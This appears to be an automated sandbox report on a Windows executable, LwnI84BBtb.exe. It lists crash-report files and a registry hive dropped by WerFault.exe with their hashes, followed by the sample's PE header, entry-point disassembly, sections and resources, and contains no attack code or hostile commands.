                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.1.1.7.2.2.6.5.1.9.4.0.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.1.1.7.2.2.7.8.6.3.1.5.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.0.9.d.e.2.0.6.-.4.f.d.f.-.4.7.3.4.-.8.9.5.6.-.4.5.0.4.b.a.2.a.f.9.5.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.1.2.a.1.f.f.1.-.4.8.7.a.-.4.5.e.4.-.8.5.6.b.-.4.3.3.4.3.5.f.a.4.c.1.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.w.n.I.8.4.B.B.t.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.e.4.-.0.0.0.1.-.0.0.1.4.-.6.f.a.8.-.a.e.4.b.5.e.9.3.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.5.0.c.5.f.b.1.6.4.d.e.7.e.a.c.4.2.a.2.8.d.6.e.4.5.1.a.0.f.5.6.0.0.0.0.0.a.1.6.!.0.0.0.0.6.5.c.1.1.b.c.0.4.5.e.6.9.b.e.c.4.e.1.6.4.9.1.4.b.2.e.2.b.3.b.f.d.2.e.f.1.2.a.2.!.L.w.n.I.8.4.B.B.t.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):65536
                                                  Entropy (8bit):0.9923492421283597
                                                  Encrypted:false
                                                  SSDEEP:192:SiAIO0jnL/lXb0U7vCoTjldFPzuiF1Z24IO8QF9:zNnjVoU7vVjlzuiF1Y4IO8a
                                                  MD5:0782158DE2D9CF3376F06224A4EDEBF5
                                                  SHA1:F1957281891FE1A62A21974C4026CE955DF6D5A4
                                                  SHA-256:68A9B7FDBA291C9647F0C415D8AD914E9C4F813FF33700CDD26D314124E9BB4D
                                                  SHA-512:E4E29B4962266126AF6FD09DFE15F4C9D6A3AE3CFEFACE37ECD31B1B71F14FCF7D564B9E3CF6191FC8FD1157CCBC8744834F37E1BCED3FF0CFA5355047E16916
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.1.1.7.2.2.5.8.0.5.2.5.2.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.b.f.a.8.4.7.0.-.f.3.2.7.-.4.b.1.1.-.9.5.8.1.-.4.a.8.c.6.c.f.9.1.f.2.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.4.6.0.7.f.4.-.6.f.b.7.-.4.d.c.f.-.8.f.a.e.-.c.f.e.8.9.3.5.3.5.2.f.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.w.n.I.8.4.B.B.t.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.e.4.-.0.0.0.1.-.0.0.1.4.-.6.f.a.8.-.a.e.4.b.5.e.9.3.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.5.0.c.5.f.b.1.6.4.d.e.7.e.a.c.4.2.a.2.8.d.6.e.4.5.1.a.0.f.5.6.0.0.0.0.0.a.1.6.!.0.0.0.0.6.5.c.1.1.b.c.0.4.5.e.6.9.b.e.c.4.e.1.6.4.9.1.4.b.2.e.2.b.3.b.f.d.2.e.f.1.2.a.2.!.L.w.n.I.8.4.B.B.t.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.4././.1.8.:.1.2.:.5.9.:.4.2.!.0.!.L.w.n.I.8.4.B.B.
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Mini DuMP crash report, 15 streams, Sat Apr 20 20:07:05 2024, 0x1205a4 type
                                                  Category:dropped
                                                  Size (bytes):53982
                                                  Entropy (8bit):2.6511634522482264
                                                  Encrypted:false
                                                  SSDEEP:384:NXlvb8nyjbBv8wQvfN/Qo4jolslzLEQsj:tlAsbBUjfN/Q/Uyej
                                                  MD5:BB3037356647F8F7F3A93CE46BE8A59C
                                                  SHA1:B1DF2818EE2FD040E5AF4485371D58E253600EBE
                                                  SHA-256:E56346731DF718DB6170D5951CC0E764BB162938CC608381E6A63B3416E07C4A
                                                  SHA-512:DB784689269ED4391F4C89F69390EF4979E094D3649E98D9FA59BA5C540F5B0DEECDC581598AC19346B899BFB490FD93573FF5F704D3A548FA2F20EF7E32EFC2
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:MDMP..a..... .......i $f............4...............H...................t....1..........`.......8...........T............=..>...........x ..........d"..............................................................................eJ......."......GenuineIntel............T...........` $f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):8410
                                                  Entropy (8bit):3.6929738404547776
                                                  Encrypted:false
                                                  SSDEEP:192:R6l7wVeJNeu6Y16Y9hSUoBjgmfmRW7pND89bDv21fp5/m:R6lXJV6Y16YrSUoFgmf5UDvMfn+
                                                  MD5:DEED6A7AD751BFF9FB3933F57B96BE09
                                                  SHA1:7512F3F2BA23F66B6087D6E043C02B2099263B58
                                                  SHA-256:57C250962AEBFBF59BFFDC63974A30236DB8A014C5366DE51716CDACA78A90EE
                                                  SHA-512:8C8273AF6D3EE169BEA7CEFDC4433F62AE86066D0B612BF8F72AD8FA72B744D4262EF8772A4439378317C05568421F35B064B5BF9F631DA354A144ACCE8A52C4
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.9.6.<./.P.i.
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4684
                                                  Entropy (8bit):4.450358073665631
                                                  Encrypted:false
                                                  SSDEEP:48:cvIwWl8zsHJg77aI91qWpW8VYUYm8M4JKN5CFJ1+q8vXN5sGpgJ4md:uIjfpI7fL7VIJKHS1KXHsfJ4md
                                                  MD5:E90C292C817C23F09C7BC61445F452F1
                                                  SHA1:59A04FE650083893FF16161A58AAE3221BDF6714
                                                  SHA-256:996FA0D2458982548EBCA464F6B67418EC17DF4EF98B49B294946287EBB094D6
                                                  SHA-512:B2E824BFDA8864A45375225FE1286C500428D4E4465AFFD6B34ACABBEA0AF7A71BA610BABE846DB327AEAE6AE7B3261F6E8E145EF997F8D51FDFBF64656207BE
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="288669" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Mini DuMP crash report, 15 streams, Sat Apr 20 20:07:06 2024, 0x1205a4 type
                                                  Category:dropped
                                                  Size (bytes):1085334
                                                  Entropy (8bit):1.067144023149537
                                                  Encrypted:false
                                                  SSDEEP:3072:u/NT2n4tPGmTebUHoz8glAH7EHI7PTyXo/5HXhHxds01:uBtPacoz8glAH7AI/yXihHfP1
                                                  MD5:F198C72B73E983CCF8F8F5BB3CF48DBA
                                                  SHA1:6CB29F5F6157CFBD60DC2618C23CD6B53D36255D
                                                  SHA-256:DE8E7768666F9F7FC59BB4597B01645130EC633D82DF904D52E1574122790B91
                                                  SHA-512:86E7E0E002B7F97AB2CEEA04C3C6D90269B11BBD2A3782A15EB3E3F437678FE7E055156120AD28CABCA57581E32309CF0A0F6BBC748DA56F73B9CCEBED44A6FE
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:MDMP..a..... .......j $f............4...............H...................d....1..........`.......8...........T...........x=...R..........x ..........d"..............................................................................eJ......."......GenuineIntel............T...........` $f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):8440
                                                  Entropy (8bit):3.6974857177660923
                                                  Encrypted:false
                                                  SSDEEP:192:R6l7wVeJNexq6Yt6Y9BSUokjgmfmEz6cI4pDP89bD4bWsfg54jm:R6lXJiq6Yt6YLSUoggmf5z6cAD4b1f6J
                                                  MD5:B9DCA74D5DA9A1D9DFE7DA84460FBEB3
                                                  SHA1:F01C7610FC4E35DE47E4EADFBF7ADAAF5D7AF046
                                                  SHA-256:181B3A038C36F8C2668C627193A989BAB5DC2B07099BACE27FE13EF14C34FA43
                                                  SHA-512:495F56FAD745F73D36C8C935CC4B62762816F878C9A686251E0495467D2253B3225CB9E594B932B467F8572ABFF9FE6EE97721BBFABD916DF91A07F1A9721636
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.9.6.<./.P.i.
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4726
                                                  Entropy (8bit):4.481108623569315
                                                  Encrypted:false
                                                  SSDEEP:48:cvIwWl8zsHJg77aI91qWpW8VYYPYm8M4JKNOrQO3FKmv+q8vXNOrQOtGpgJ43d:uIjfpI7fL7VRSJKGQlmvKXGQ2fJ43d
                                                  MD5:774F69B19A9CCF36565A3BF600CD4746
                                                  SHA1:871D0C93AE8D2ADBAA3F0E2A43A8477B673403E4
                                                  SHA-256:394529242DC0A38CEFC7AC290294BF43082AD560803C0C5ADBC94DF81CAC53B2
                                                  SHA-512:B9F8092CB34D234FB93B1763B4167BCAA637931FDE95DEE8CC27D21EE4E10B96456A640789DA9D8EAB0A92BD806442366454BF2DEB793CC496856F9BB5779867
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="288669" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:MS Windows registry file, NT/2000 or above
                                                  Category:dropped
                                                  Size (bytes):1835008
                                                  Entropy (8bit):4.465397250245093
                                                  Encrypted:false
                                                  SSDEEP:6144:0IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNddwBCswSbN:JXD94+WlLZMM6YFHr+N
                                                  MD5:2AB80D9D594A587E6E42D21C8D844A7A
                                                  SHA1:DD0A50B674B6B001A5C34782ABF652E20B4D2A5A
                                                  SHA-256:86125B392CF0E8B70723021E18AADACA842EE47231F4B888A9218A099750BDBC
                                                  SHA-512:872C9578B5E6C062540F732C4FF8542B3A1623A523BC7AF9FE25F08349AC5C043C57350D05D1FA493D9D80387AC12DF277A6D6636B0E422D58855ECB7FD5B3DD
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.a.Q^................................................................................................................................................................................................................................................................................................................................................h.e........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):6.853160286288826
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:LwnI84BBtb.exe
                                                  File size:406'528 bytes
                                                  MD5:49293c745f0fd48ab2784cad7cc5a0ac
                                                  SHA1:65c11bc045e69bec4e164914b2e2b3bfd2ef12a2
                                                  SHA256:25c3cd7375f5244402a5b407a107266c2c93dcaa6f313d78ad944689a2be184f
                                                  SHA512:c99c956c53543773adfb21105ff86ae1793c376075d096ec7a77828b0b004b9a88f458ce2c31def266eef91fb153c71ad87f7aa87985cf86e49af9215bc70316
                                                  SSDEEP:6144:K4E8f5SKo6pmUJFMeZj0nGa4jDmePeGchyU7UvAg6LzsA:K78f5w6pFF3oGPPQ7Uaz1
                                                  TLSH:DD848C0372E1BC66E56247328F5E9AEC372DF8614E15BB5F2248AE2F28701B1D637711
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................W.......h.Q.....i.....................e-m.......S.....e-V.....Rich....................PE..L...@..d...........
                                                  Icon Hash:432551414d55510d
                                                  Entrypoint:0x403d77
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x64BFBC40 [Tue Jul 25 12:12:48 2023 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:deee2f3ec985195fc99175dfed532c7c
                                                  Instruction
                                                  call 00007FB43D351888h
                                                  jmp 00007FB43D34A455h
                                                  push 00000014h
                                                  push 004177F0h
                                                  call 00007FB43D34EA78h
                                                  call 00007FB43D351A59h
                                                  movzx esi, ax
                                                  push 00000002h
                                                  call 00007FB43D35181Bh
                                                  pop ecx
                                                  mov eax, 00005A4Dh
                                                  cmp word ptr [00400000h], ax
                                                  je 00007FB43D34A456h
                                                  xor ebx, ebx
                                                  jmp 00007FB43D34A485h
                                                  mov eax, dword ptr [0040003Ch]
                                                  cmp dword ptr [eax+00400000h], 00004550h
                                                  jne 00007FB43D34A43Dh
                                                  mov ecx, 0000010Bh
                                                  cmp word ptr [eax+00400018h], cx
                                                  jne 00007FB43D34A42Fh
                                                  xor ebx, ebx
                                                  cmp dword ptr [eax+00400074h], 0Eh
                                                  jbe 00007FB43D34A45Bh
                                                  cmp dword ptr [eax+004000E8h], ebx
                                                  setne bl
                                                  mov dword ptr [ebp-1Ch], ebx
                                                  call 00007FB43D34E26Eh
                                                  test eax, eax
                                                  jne 00007FB43D34A45Ah
                                                  push 0000001Ch
                                                  call 00007FB43D34A531h
                                                  pop ecx
                                                  call 00007FB43D34DA30h
                                                  test eax, eax
                                                  jne 00007FB43D34A45Ah
                                                  push 00000010h
                                                  call 00007FB43D34A520h
                                                  pop ecx
                                                  call 00007FB43D351894h
                                                  and dword ptr [ebp-04h], 00000000h
                                                  call 00007FB43D35090Dh
                                                  test eax, eax
                                                  jns 00007FB43D34A45Ah
                                                  push 0000001Bh
                                                  call 00007FB43D34A506h
                                                  pop ecx
                                                  call dword ptr [004110C8h]
                                                  mov dword ptr [01A14E80h], eax
                                                  call 00007FB43D3518AFh
                                                  mov dword ptr [0044CDCCh], eax
                                                  call 00007FB43D351252h
                                                  test eax, eax
                                                  jns 00007FB43D34A45Ah
                                                  Programming Language:
                                                  • [ASM] VS2013 build 21005
                                                  • [ C ] VS2013 build 21005
                                                  • [C++] VS2013 build 21005
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [RES] VS2013 build 21005
                                                  • [LNK] VS2013 UPD5 build 40629
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x17c440x78.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x16150000x17c00.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x112100x38.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x171780x40.rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x110000x19c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000xfec50x10000c7d5c14e347f555af284966d3887f38fFalse0.604034423828125data6.7072054579447755IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x110000x75d00x7600075370d77a13d93e84cafb668839f1a3False0.3941009004237288data4.941145593266466IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0x190000x15fbe840x33e00a8fab69814f0b8856893cec71ea5de23unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x16150000x17c000x17c005a8350554404b4c58677b1f3fac55ce6False0.3187705592105263data4.147489583276286IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_CURSOR0x1627ae00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.26439232409381663
                                                  RT_CURSOR0x16289880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.3686823104693141
                                                  RT_CURSOR0x16292300x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.49060693641618497
                                                  RT_CURSOR0x16297c80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                                  RT_CURSOR0x16298f80xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                                  RT_CURSOR0x16299d00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                                  RT_CURSOR0x162a8780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                                  RT_CURSOR0x162b1200x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                                  RT_ICON0x16158d00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0RomanianRomania0.41359447004608296
                                                  RT_ICON0x1615f980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.16524896265560166
                                                  RT_ICON0x16185400x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.2154255319148936
                                                  RT_ICON0x16189d80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0RomanianRomania0.41359447004608296
                                                  RT_ICON0x16190a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.16524896265560166
                                                  RT_ICON0x161b6480x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.2154255319148936
                                                  RT_ICON0x161bae00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0RomanianRomania0.37100213219616207
                                                  RT_ICON0x161c9880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0RomanianRomania0.45306859205776173
                                                  RT_ICON0x161d2300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0RomanianRomania0.4619815668202765
                                                  RT_ICON0x161d8f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RomanianRomania0.45664739884393063
                                                  RT_ICON0x161de600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.2691908713692946
                                                  RT_ICON0x16204080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RomanianRomania0.3062851782363977
                                                  RT_ICON0x16214b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.350177304964539
                                                  RT_ICON0x16219800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0RomanianRomania0.5666311300639659
                                                  RT_ICON0x16228280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0RomanianRomania0.5473826714801444
                                                  RT_ICON0x16230d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RomanianRomania0.6184971098265896
                                                  RT_ICON0x16236380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.46524896265560167
                                                  RT_ICON0x1625be00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RomanianRomania0.48897748592870544
                                                  RT_ICON0x1626c880x988Device independent bitmap graphic, 24 x 48 x 32, image size 0RomanianRomania0.49631147540983606
                                                  RT_ICON0x16276100x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.4512411347517731
                                                  RT_DIALOG0x162b8a80x52data0.8780487804878049
                                                  RT_STRING0x162b9000x3d2dataRomanianRomania0.4539877300613497
                                                  RT_STRING0x162bcd80x32adataRomanianRomania0.47901234567901235
                                                  RT_STRING0x162c0080x1a8dataRomanianRomania0.49528301886792453
                                                  RT_STRING0x162c1b00x30adataRomanianRomania0.47429305912596403
                                                  RT_STRING0x162c4c00x534dataRomanianRomania0.44744744744744747
                                                  RT_STRING0x162c9f80x208dataRomanianRomania0.5038461538461538
                                                  RT_GROUP_CURSOR0x16297980x30data0.9375
                                                  RT_GROUP_CURSOR0x16299a80x22data1.0588235294117647
                                                  RT_GROUP_CURSOR0x162b6880x30data0.9375
                                                  RT_GROUP_ICON0x1627a780x68dataRomanianRomania0.7115384615384616
                                                  RT_GROUP_ICON0x16189a80x30dataRomanianRomania0.9375
                                                  RT_GROUP_ICON0x16219180x68dataRomanianRomania0.7115384615384616
                                                  RT_GROUP_ICON0x161bab00x30dataRomanianRomania1.0
                                                  RT_VERSION0x162b6b80x1ecdata0.5386178861788617
                                                  DLLImport
